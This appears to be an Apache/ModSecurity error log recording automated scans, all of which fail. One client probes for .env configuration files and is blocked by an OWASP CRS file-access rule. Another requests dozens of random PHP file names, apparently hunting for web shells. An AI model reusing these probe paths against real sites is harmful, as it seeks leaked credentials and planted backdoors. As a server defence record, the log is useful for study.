[Mon May 11 12:18:12.822358 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:46736] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rust/.env.debug-hotfix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/rust/.env.debug-hotfix"] [unique_id "agGs5EYQeUtAPynIs6xiIAAAABI"]
[Mon May 11 12:18:12.822829 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:46736] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/rust/.env.debug-hotfix"] [unique_id "agGs5EYQeUtAPynIs6xiIAAAABI"]
[Mon May 11 12:18:12.898663 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/kj.php
[Mon May 11 12:18:13.106588 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/gettest.php
[Mon May 11 12:18:13.319604 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/fff.php
[Mon May 11 12:18:13.511304 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/ortasekerli1.php
[Mon May 11 12:18:13.702841 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/gifclass.php
[Mon May 11 12:18:13.894491 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/motu.php
[Mon May 11 12:18:14.021702 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:46736] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGs5EYQeUtAPynIs6xiIAAAABI"]
[Mon May 11 12:18:14.047203 2026] [security2:error] [pid 1254212:tid 1254231] [client 185.177.72.9:49060] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rust/.env.example._"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/rust/.env.example._"] [unique_id "agGs5kYQeUtAPynIs6xiIQAAABE"]
[Mon May 11 12:18:14.047802 2026] [security2:error] [pid 1254212:tid 1254231] [client 185.177.72.9:49060] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/rust/.env.example._"] [unique_id "agGs5kYQeUtAPynIs6xiIQAAABE"]
[Mon May 11 12:18:14.094591 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/Sanskrit.php
[Mon May 11 12:18:14.310858 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/green.php
[Mon May 11 12:18:14.511680 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/ws83.php
[Mon May 11 12:18:14.725108 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/bthil.php
[Mon May 11 12:18:14.931199 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/mh.php
[Mon May 11 12:18:15.123666 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/fs.php
[Mon May 11 12:18:15.251489 2026] [security2:error] [pid 1254212:tid 1254231] [client 185.177.72.9:49060] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGs5kYQeUtAPynIs6xiIQAAABE"]
[Mon May 11 12:18:15.274572 2026] [security2:error] [pid 1254328:tid 1254332] [client 185.177.72.9:49064] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rust/.env.example._"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/rust/.env.example._"] [unique_id "agGs50Rdw2n9wv6Ai48RRwAAAIE"]
[Mon May 11 12:18:15.275011 2026] [security2:error] [pid 1254328:tid 1254332] [client 185.177.72.9:49064] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/rust/.env.example._"] [unique_id "agGs50Rdw2n9wv6Ai48RRwAAAIE"]
[Mon May 11 12:18:15.327247 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/albin.php
[Mon May 11 12:18:15.545330 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/file.php
[Mon May 11 12:18:15.754389 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/ws80.php
[Mon May 11 12:18:15.961587 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/bgymj.php
[Mon May 11 12:18:16.154622 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/wper.php
[Mon May 11 12:18:16.357376 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/wtiiy.php
[Mon May 11 12:18:16.485556 2026] [security2:error] [pid 1254328:tid 1254332] [client 185.177.72.9:49064] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGs50Rdw2n9wv6Ai48RRwAAAIE"]
[Mon May 11 12:18:16.549025 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/xwx1.php
[Mon May 11 12:18:16.741329 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/a4.php
[Mon May 11 12:18:16.935426 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/wp-blog.php
[Mon May 11 12:18:17.127165 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/ws85.php
[Mon May 11 12:18:17.858077 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/ws88.php
[Mon May 11 12:18:18.087397 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/wp-blogs.php
[Mon May 11 12:18:18.303132 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/ws78.php
[Mon May 11 12:18:23.936425 2026] [security2:error] [pid 1256241:tid 1256267] [client 185.177.72.9:63614] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sbin/.env.example-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/sbin/.env.example-update"] [unique_id "agGs75kIEwRJMyDaV55XnAAAAVU"]
[Mon May 11 12:18:23.937127 2026] [security2:error] [pid 1256241:tid 1256267] [client 185.177.72.9:63614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/sbin/.env.example-update"] [unique_id "agGs75kIEwRJMyDaV55XnAAAAVU"]
[Mon May 11 12:18:25.142368 2026] [security2:error] [pid 1256241:tid 1256267] [client 185.177.72.9:63614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGs75kIEwRJMyDaV55XnAAAAVU"]
[Mon May 11 12:18:25.167716 2026] [security2:error] [pid 1254133:tid 1254146] [client 185.177.72.9:63618] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sbin/.env.example-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/sbin/.env.example-update"] [unique_id "agGs8RjZymfuKpjWXeiGiAAAAMo"]
[Mon May 11 12:18:25.168231 2026] [security2:error] [pid 1254133:tid 1254146] [client 185.177.72.9:63618] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/sbin/.env.example-update"] [unique_id "agGs8RjZymfuKpjWXeiGiAAAAMo"]
[Mon May 11 12:18:26.437421 2026] [security2:error] [pid 1254133:tid 1254146] [client 185.177.72.9:63618] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGs8RjZymfuKpjWXeiGiAAAAMo"]
[Mon May 11 12:18:39.322403 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:38284] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /scripts/.env.docker2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/scripts/.env.docker2024"] [unique_id "agGs_5kIEwRJMyDaV55XtQAAAUk"]
[Mon May 11 12:18:39.322972 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:38284] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/scripts/.env.docker2024"] [unique_id "agGs_5kIEwRJMyDaV55XtQAAAUk"]
[Mon May 11 12:18:40.713004 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:38284] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGs_5kIEwRJMyDaV55XtQAAAUk"]
[Mon May 11 12:18:40.739842 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:38296] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /scripts/.env.docker2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/scripts/.env.docker2024"] [unique_id "agGtAGS6k_SCYd1AVZq4PQAAAQY"]
[Mon May 11 12:18:40.740967 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:38296] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/scripts/.env.docker2024"] [unique_id "agGtAGS6k_SCYd1AVZq4PQAAAQY"]
[Mon May 11 12:18:42.209103 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:38296] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtAGS6k_SCYd1AVZq4PQAAAQY"]
[Mon May 11 12:19:01.927896 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:54092] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /seeds/.env.debug._"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/seeds/.env.debug._"] [unique_id "agGtFURdw2n9wv6Ai48RfwAAAJg"]
[Mon May 11 12:19:01.928569 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:54092] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/seeds/.env.debug._"] [unique_id "agGtFURdw2n9wv6Ai48RfwAAAJg"]
[Mon May 11 12:19:03.100750 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:54092] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtFURdw2n9wv6Ai48RfwAAAJg"]
[Mon May 11 12:19:03.126954 2026] [security2:error] [pid 1254242:tid 1254268] [client 185.177.72.9:17394] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /seeds/.env.debug._"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/seeds/.env.debug._"] [unique_id "agGtF74KNmD_mZ_vlf9C7QAAAFc"]
[Mon May 11 12:19:03.127734 2026] [security2:error] [pid 1254242:tid 1254268] [client 185.177.72.9:17394] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/seeds/.env.debug._"] [unique_id "agGtF74KNmD_mZ_vlf9C7QAAAFc"]
[Mon May 11 12:19:04.349231 2026] [security2:error] [pid 1254242:tid 1254268] [client 185.177.72.9:17394] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtF74KNmD_mZ_vlf9C7QAAAFc"]
[Mon May 11 12:19:04.373967 2026] [security2:error] [pid 1254179:tid 1254191] [client 185.177.72.9:17404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /seeds/.env.development-fix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/seeds/.env.development-fix"] [unique_id "agGtGGS6k_SCYd1AVZq4WgAAAQo"]
[Mon May 11 12:19:04.374195 2026] [security2:error] [pid 1254179:tid 1254191] [client 185.177.72.9:17404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/seeds/.env.development-fix"] [unique_id "agGtGGS6k_SCYd1AVZq4WgAAAQo"]
[Mon May 11 12:19:05.628865 2026] [security2:error] [pid 1254179:tid 1254191] [client 185.177.72.9:17404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtGGS6k_SCYd1AVZq4WgAAAQo"]
[Mon May 11 12:19:05.654276 2026] [security2:error] [pid 1256241:tid 1256269] [client 185.177.72.9:17408] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /seeds/.env.development-fix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/seeds/.env.development-fix"] [unique_id "agGtGZkIEwRJMyDaV55X4QAAAVc"]
[Mon May 11 12:19:05.654883 2026] [security2:error] [pid 1256241:tid 1256269] [client 185.177.72.9:17408] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/seeds/.env.development-fix"] [unique_id "agGtGZkIEwRJMyDaV55X4QAAAVc"]
[Mon May 11 12:19:06.905832 2026] [security2:error] [pid 1256241:tid 1256269] [client 185.177.72.9:17408] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtGZkIEwRJMyDaV55X4QAAAVc"]
